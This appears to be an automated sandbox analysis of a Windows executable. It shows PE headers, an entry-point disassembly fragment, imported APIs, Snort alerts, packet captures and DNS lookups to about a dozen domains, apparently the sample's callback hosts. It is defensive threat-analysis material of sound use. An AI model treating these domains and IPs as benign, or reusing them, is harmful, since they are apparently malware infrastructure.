                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:ced282d9b261d1462772017fe2f6972b

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  sub esp, 00000184h
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  xor ebx, ebx
                                                                                  push 00008001h
                                                                                  mov dword ptr [esp+18h], ebx
                                                                                  mov dword ptr [esp+10h], 0040A198h
                                                                                  mov dword ptr [esp+20h], ebx
                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                  call dword ptr [004080B8h]
                                                                                  call dword ptr [004080BCh]
                                                                                  and eax, BFFFFFFFh
                                                                                  cmp ax, 00000006h
                                                                                  mov dword ptr [0042F42Ch], eax
                                                                                  je 00007F83A4CB5933h
                                                                                  push ebx
                                                                                  call 00007F83A4CB8A96h
                                                                                  cmp eax, ebx
                                                                                  je 00007F83A4CB5929h
                                                                                  push 00000C00h
                                                                                  call eax
                                                                                  mov esi, 004082A0h
                                                                                  push esi
                                                                                  call 00007F83A4CB8A12h
                                                                                  push esi
                                                                                  call dword ptr [004080CCh]
                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                  cmp byte ptr [esi], bl
                                                                                  jne 00007F83A4CB590Dh
                                                                                  push 0000000Bh
                                                                                  call 00007F83A4CB8A6Ah
                                                                                  push 00000009h
                                                                                  call 00007F83A4CB8A63h
                                                                                  push 00000007h
                                                                                  mov dword ptr [0042F424h], eax
                                                                                  call 00007F83A4CB8A57h
                                                                                  cmp eax, ebx
                                                                                  je 00007F83A4CB5931h
                                                                                  push 0000001Eh
                                                                                  call eax
                                                                                  test eax, eax
                                                                                  je 00007F83A4CB5929h
                                                                                  or byte ptr [0042F42Fh], 00000040h
                                                                                  push ebp
                                                                                  call dword ptr [00408038h]
                                                                                  push ebx
                                                                                  call dword ptr [00408288h]
                                                                                  mov dword ptr [0042F4F8h], eax
                                                                                  push ebx
                                                                                  lea eax, dword ptr [esp+38h]
                                                                                  push 00000160h
                                                                                  push eax
                                                                                  push ebx
                                                                                  push 00429850h
                                                                                  call dword ptr [0040816Ch]
                                                                                  push 0040A188h

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x33b28.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x64570x6600False0.66823682598data6.43498570321IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x80000x13800x1400False0.4625data5.26100389731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xa0000x255380x600False0.463541666667data4.133728555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                  .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x380000x33b280x33c00False0.497480751812data5.28997877298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  RT_ICON0x383100x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                  RT_ICON0x48b380xba0dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                  RT_ICON0x545480x94a8dataEnglishUnited States
                                                                                  RT_ICON0x5d9f00x5488dataEnglishUnited States
                                                                                  RT_ICON0x62e780x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                  RT_ICON0x670a00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                  RT_ICON0x696480x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                  RT_ICON0x6a6f00x988dataEnglishUnited States
                                                                                  RT_ICON0x6b0780x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                  RT_DIALOG0x6b4e00x100dataEnglishUnited States
                                                                                  RT_DIALOG0x6b5e00x11cdataEnglishUnited States
                                                                                  RT_DIALOG0x6b7000x60dataEnglishUnited States
                                                                                  RT_GROUP_ICON0x6b7600x84dataEnglishUnited States
                                                                                  RT_MANIFEST0x6b7e80x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                  Imports

                                                                                  DLLImport
                                                                                  ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                                  SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                                  ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                  USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                  KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                  05/12/21-20:03:21.436414TCP1201ATTACK-RESPONSES 403 Forbidden804975234.102.136.180192.168.2.4
                                                                                  05/12/21-20:03:32.193681TCP1201ATTACK-RESPONSES 403 Forbidden804976334.102.136.180192.168.2.4
                                                                                  05/12/21-20:03:48.182682TCP1201ATTACK-RESPONSES 403 Forbidden804976634.102.136.180192.168.2.4
                                                                                  05/12/21-20:04:04.026160TCP1201ATTACK-RESPONSES 403 Forbidden804976823.227.38.74192.168.2.4
                                                                                  05/12/21-20:04:09.293071TCP1201ATTACK-RESPONSES 403 Forbidden804977134.102.136.180192.168.2.4
                                                                                  05/12/21-20:04:31.157010TCP1201ATTACK-RESPONSES 403 Forbidden804977534.102.136.180192.168.2.4

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 12, 2021 20:03:15.571806908 CEST4974480192.168.2.444.227.76.166
                                                                                  May 12, 2021 20:03:15.774904966 CEST804974444.227.76.166192.168.2.4
                                                                                  May 12, 2021 20:03:15.777678967 CEST4974480192.168.2.444.227.76.166
                                                                                  May 12, 2021 20:03:15.981957912 CEST804974444.227.76.166192.168.2.4
                                                                                  May 12, 2021 20:03:15.982130051 CEST4974480192.168.2.444.227.76.166
                                                                                  May 12, 2021 20:03:16.184225082 CEST804974444.227.76.166192.168.2.4
                                                                                  May 12, 2021 20:03:16.190001965 CEST804974444.227.76.166192.168.2.4
                                                                                  May 12, 2021 20:03:16.190017939 CEST804974444.227.76.166192.168.2.4
                                                                                  May 12, 2021 20:03:16.190237999 CEST4974480192.168.2.444.227.76.166
                                                                                  May 12, 2021 20:03:16.190298080 CEST4974480192.168.2.444.227.76.166
                                                                                  May 12, 2021 20:03:16.392328024 CEST804974444.227.76.166192.168.2.4
                                                                                  May 12, 2021 20:03:21.257399082 CEST4975280192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:21.298505068 CEST804975234.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:21.298692942 CEST4975280192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:21.298877954 CEST4975280192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:21.339843988 CEST804975234.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:21.436414003 CEST804975234.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:21.436446905 CEST804975234.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:21.436570883 CEST4975280192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:21.436635971 CEST4975280192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:21.477725983 CEST804975234.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:26.511318922 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.704844952 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.704986095 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.705135107 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.905880928 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.905924082 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.905945063 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.905966997 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.905987978 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.906013012 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.906034946 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.906050920 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.906058073 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.906074047 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:26.906171083 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.906203985 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:26.906291008 CEST4975780192.168.2.4198.54.114.164
                                                                                  May 12, 2021 20:03:27.099024057 CEST8049757198.54.114.164192.168.2.4
                                                                                  May 12, 2021 20:03:32.014677048 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.055665970 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:32.055772066 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.055988073 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.098042965 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:32.193681002 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:32.193705082 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:32.193893909 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.193919897 CEST4976380192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:32.236896038 CEST804976334.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:37.295784950 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.372031927 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:37.372140884 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.372333050 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.449304104 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:37.449553967 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:37.449605942 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:37.449742079 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.449825048 CEST4976480192.168.2.4185.4.135.136
                                                                                  May 12, 2021 20:03:37.526467085 CEST8049764185.4.135.136192.168.2.4
                                                                                  May 12, 2021 20:03:42.629906893 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:42.767245054 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:42.767443895 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:42.767637014 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:42.905056000 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:42.905261993 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:42.905289888 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:42.905524969 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:42.905595064 CEST4976580192.168.2.43.16.197.4
                                                                                  May 12, 2021 20:03:43.044230938 CEST80497653.16.197.4192.168.2.4
                                                                                  May 12, 2021 20:03:48.001588106 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.045504093 CEST804976634.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:48.045645952 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.045959949 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.089550972 CEST804976634.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:48.182682037 CEST804976634.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:48.182719946 CEST804976634.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:48.183000088 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.183528900 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.225518942 CEST804976634.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:53.348578930 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.476600885 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:03:53.476844072 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.476977110 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.607042074 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:03:53.613686085 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:03:53.613758087 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:03:53.613966942 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.614051104 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.742172956 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:04:03.739383936 CEST4976880192.168.2.423.227.38.74
                                                                                  May 12, 2021 20:04:03.782073975 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:03.782262087 CEST4976880192.168.2.423.227.38.74
                                                                                  May 12, 2021 20:04:03.782355070 CEST4976880192.168.2.423.227.38.74
                                                                                  May 12, 2021 20:04:03.823199034 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026160002 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026191950 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026207924 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026223898 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026237011 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026252985 CEST804976823.227.38.74192.168.2.4

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 12, 2021 20:02:13.063652039 CEST5912353192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:13.115976095 CEST53591238.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:13.950892925 CEST5453153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:14.001583099 CEST53545318.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:14.862333059 CEST4971453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:14.910777092 CEST53497148.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:16.253977060 CEST5802853192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:16.312331915 CEST53580288.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:17.959619999 CEST5309753192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:18.018564939 CEST53530978.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:19.917366982 CEST4925753192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:19.968873978 CEST53492578.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:20.905808926 CEST6238953192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:20.957370996 CEST53623898.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:22.008506060 CEST4991053192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:22.060240030 CEST53499108.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:23.610280991 CEST5585453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:23.672235966 CEST53558548.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:24.907501936 CEST6454953192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:24.959218979 CEST53645498.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:26.840797901 CEST6315353192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:26.891748905 CEST53631538.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:27.852621078 CEST5299153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:27.901262045 CEST53529918.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:29.118077040 CEST5370053192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:29.168251038 CEST53537008.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:30.055177927 CEST5172653192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:30.112361908 CEST53517268.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:31.206779957 CEST5679453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:31.255425930 CEST53567948.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:48.330780983 CEST5653453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:48.398782969 CEST53565348.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:49.652365923 CEST5662753192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:49.701029062 CEST53566278.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:52.528722048 CEST5662153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:52.579396963 CEST53566218.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:53.465450048 CEST6311653192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:53.517167091 CEST53631168.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:54.630578995 CEST6407853192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:54.679369926 CEST53640788.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:56.183978081 CEST6480153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:56.233654976 CEST53648018.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:59.364567995 CEST6172153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:59.423401117 CEST53617218.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:08.425471067 CEST5125553192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:08.482908010 CEST53512558.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:15.367290020 CEST6152253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:15.565867901 CEST53615228.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:17.725886106 CEST5233753192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:17.826119900 CEST53523378.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:18.362668991 CEST5504653192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:18.554306984 CEST53550468.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:19.165740013 CEST4961253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:19.229396105 CEST53496128.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:19.479994059 CEST4928553192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:19.545161009 CEST53492858.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:19.681936026 CEST5060153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:19.739070892 CEST53506018.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:20.341811895 CEST6087553192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:20.403373003 CEST53608758.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:20.950119972 CEST5644853192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:21.008697987 CEST53564488.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:21.196305990 CEST5917253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:21.256314039 CEST53591728.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:21.501291990 CEST6242053192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:21.549973965 CEST53624208.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:22.291475058 CEST6057953192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:22.351526022 CEST53605798.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:23.481899977 CEST5018353192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:23.544143915 CEST53501838.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:23.963395119 CEST6153153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:24.012821913 CEST53615318.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:26.447210073 CEST4922853192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:26.510171890 CEST53492288.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:27.032042980 CEST5979453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:27.093102932 CEST53597948.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:31.948725939 CEST5591653192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:32.012048960 CEST53559168.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:37.212663889 CEST5275253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:37.294027090 CEST53527528.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:42.467097044 CEST6054253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:42.628508091 CEST53605428.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:47.937995911 CEST6068953192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:47.999537945 CEST53606898.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:53.199996948 CEST6420653192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:53.347131014 CEST53642068.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:03.668735027 CEST5090453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:03.738435030 CEST53509048.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:03.935262918 CEST5752553192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:04.003670931 CEST53575258.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:06.033979893 CEST5381453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:06.099162102 CEST53538148.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:09.047368050 CEST5341853192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:09.111213923 CEST53534188.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:14.310559034 CEST6283353192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:14.373636007 CEST53628338.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:19.542972088 CEST5926053192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:19.890546083 CEST53592608.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:25.495456934 CEST4994453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:25.639183998 CEST53499448.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:30.903311968 CEST6330053192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:30.975553036 CEST53633008.8.8.8192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  May 12, 2021 20:03:15.367290020 CEST192.168.2.48.8.8.80x9f67Standard query (0)www.healshameyoga.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:21.196305990 CEST192.168.2.48.8.8.80x5ceeStandard query (0)www.rogersbeefarm.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:26.447210073 CEST192.168.2.48.8.8.80x3912Standard query (0)www.nowhealthdays.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:31.948725939 CEST192.168.2.48.8.8.80xcf80Standard query (0)www.ikeberto.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:37.212663889 CEST192.168.2.48.8.8.80x7424Standard query (0)www.directflence.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:42.467097044 CEST192.168.2.48.8.8.80x78bStandard query (0)www.mmgenius.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:47.937995911 CEST192.168.2.48.8.8.80xce09Standard query (0)www.rainboxs.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:53.199996948 CEST192.168.2.48.8.8.80x776cStandard query (0)www.nobleandmarble.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:03.668735027 CEST192.168.2.48.8.8.80x987eStandard query (0)www.safegrinder.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:09.047368050 CEST192.168.2.48.8.8.80x5430Standard query (0)www.tecquestrian.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:14.310559034 CEST192.168.2.48.8.8.80x8005Standard query (0)www.booweats.comA (IP address)IN (0x0001)
